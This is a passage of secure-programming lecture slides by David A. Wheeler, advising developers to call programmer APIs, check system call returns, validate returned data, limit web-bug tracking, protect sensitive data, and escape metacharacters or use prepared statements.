Call Only Interfaces Intended for Programmers • Usually unwise to invoke a program intended for human interaction (text or GUI) – Programs for humans are intentionally rich & often difficult to completely control – May have “escape hatches” to unintended functions – Interactive programs often try to intuit the “most likely” meaning • May not be what you were expecting • Attacker may find a way to exploit this • Usually there’s a different program/API for other programs’ use; use that instead – E. G. , don’t invoke ed/vi/emacs for text processing, use sed/awk/perl • Similarly, provide an API/programmer interface if sensible – Perhaps have GUI that then invokes API (good approach anyway) 62

Check All System Call Returns • Check every system call that can return an error condition – Nearly all system calls require limited system resources, and users can often affect resources in a variety of ways – If the error cannot be handled gracefully, then fail safe 63

Check information when it returns • Reuse input filtering concepts from earlier… values from libraries are yet more input – If number: Is it within some plausible range? – If string: Does it match a whitelist filter? – If complex (e. g. , file/data type): • Is it one of the permitted file/data types? – If an image (e. g. , tile from geometry server): • Height/width in range? Is it really an image format? – If it takes too long to respond, consider alternatives • This can be hard to do everywhere, in which case, prioritize where it’s riskier • Can be helpful in countering defects in components, even if it is not security issue 64

Counter Web Bugs When Retrieving Embedded Content • Some data formats (e. g. , HTML) can embed references to content that is automatically retrieved when the data is viewed (transclusion) – Without waiting for user selection – Privacy issue – enables “web bug” so others can obtain information about a reader without his knowledge • In a web bug: – A reference intentionally inserted into a document and used by the content author to track who, where, and how often a document is read (e. g. , 1 x 1 pixel “image” loaded from somewhere else) – Can see how a “bugged” document is passed from one person to another or from one organization to another • Primarily an issue with file format design (can’t undo HTML) • If your users value their privacy, you probably will want to limit the automatic downloading of included files (e. g. , from other sites) 65

Hide Sensitive Information (1) • Hide sensitive information (e. g. , private, personallyidentifying information, passwords, …) – In transit (input & output) – At rest (stored) • In transit – web-based applications – Typically use https: (HTTP on top of SSL or TLS) – Don’t allow GET to submit information – encoded in Request. URI, which is often logged • Encrypt any storage – Doesn’t help if attacker breaks into the application – Does defend against someone who gets storage device without encryption keys • Encrypt passwords (with salted hashes – explain later) 66

Hide Sensitive Information (2) • Don’t send it, if you don’t have to – E. G. , create special “local” ids when sending to other sites – Translate back – Make it hard for external sites to reveal info about your users, data, etc. 67

Conclusions • In practice, must depend on other components – Libraries, OS, DBMS, etc. • Be careful about how you call out to them – Metacharacters in particular can cause trouble – SQL, command shell, filenames, log/debug entries – Don’t allow anything to be sent to another component unless you’re sure it’s okay – SQL: Use prepared statements (usual approach) – In other cases, often need to escape data to be sent – Input validation often not enough • Support detection & recovery, e. g. , by logging • Be careful about what you accept back 68

Released under CC BY-SA 3. 0 • This presentation is released under the Creative Commons Attribution. Share. Alike 3. 0 Unported (CC BY-SA 3. 0) license • You are free: – to Share — to copy, distribute and transmit the work – to Remix — to adapt the work – to make commercial use of the work • Under the following conditions: – Attribution — You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work) – Share Alike — If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one • These conditions can be waived by permission from the copyright holder – dwheeler at dwheeler dot com • Details at: http: //creativecommons. org/licenses/by-sa/3. 0/ • Attribute me as “David A. Wheeler” 69